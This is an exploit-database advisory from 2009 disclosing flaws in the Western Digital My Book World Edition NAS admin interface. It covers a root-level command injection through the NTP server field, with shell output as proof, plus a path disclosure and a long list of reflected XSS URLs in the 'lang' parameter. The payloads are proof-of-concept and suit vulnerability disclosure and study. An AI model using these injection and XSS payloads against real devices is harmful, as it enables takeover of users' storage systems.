My Book World Edition NAS multiple vulnerability

2009-12-30T00:00:00
ID 1337DAY-ID-10533
Type zdt
Reporter emgent
Modified 2009-12-30T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================
My Book World Edition NAS multiple vulnerability
================================================

# Exploit Title: My Book World Edition NAS multiple vulnerability
# Date: 20091230
# Author: Emanuele 'emgent' Gentili
# Code: http://www.backtrack.it/~emgent/exploits/20091230-NAS.txt
# Version: 01.01.16 with MioNet 2.3.9.13 firmware.
# CVE : N/A
# Vendor: http://www.wdc.com/mybookworld
 
[+] REMOTE COMMAND EXECUTION
 
Pages:
http://10.12.6.111/admin/e_datetime.php?lang=en
http://10.12.6.111/admin/system_general.php?lang=en
 
Box entry:
NTP TIME SERVER: "pool.ntp.org && touch /tmp/pwned.txt"
 
Output:
~ # ls -la /tmp/ |grep pwned
-rw-rw-rw-    1 root     root            0 Dec 30 08:25 pwned.txt
~ #
 
 
[+] WEB SERVER DEFAULT SECURITY MISSCONFIGURATION
 
All services and web applications run with root privileges, so exploiting
web apps is possible run command with uid 0 privileges.
 
 
[+] INFORMATION DISCLOSURE
 
Browsing http://10.12.6.111/help/express.php?lang=en%22 is possible see the real path
in the system, via xml error not blocked.
 
 
[+] CROSS SITE SCRIPTING (XSS)
 
A lot of XSS attacks are possible in this web application, all "?lang=" var are vulnerable.
 
http://10.12.6.111/admin/basic_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_config_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_alerts.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_firmware_automated.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_firmware_manual.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_general.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/shutdown_reboot.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/shutdown_reboot.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_advanced.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_generate_ssl_form.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_lan.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_service.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_workgroup_domain.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_disk_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_volume_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_share_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_usb_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_quota_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_download_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_change_btadmin_passwd.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_share_add.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_share_edit.php?share=user&volume=DataVolume&md=md2&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/media_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/itune_server_properties.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/access_control_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/access_control_shareaccess_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/access_control_shareaccess_edit.php?id=1&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_system.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_cifs.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_ftp.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_setting.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_shutdown_reboot.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_machine.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_datetime.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_network.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_mgmt.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_change_passwd.php?id=2&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_mgmt.php?act=del&id=user&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_add.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_share_mgmt.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_share_mgmt.php?type=share&act=del&share=user&volume=DataVolume&md=md2&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_share_add.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_mionet.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/basic_index.php?action=logout&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/help/system.php?lang=en"><script>alert('XSS');</script>&page=system_summary
and more other...



#  0day.today [2016-04-20]  #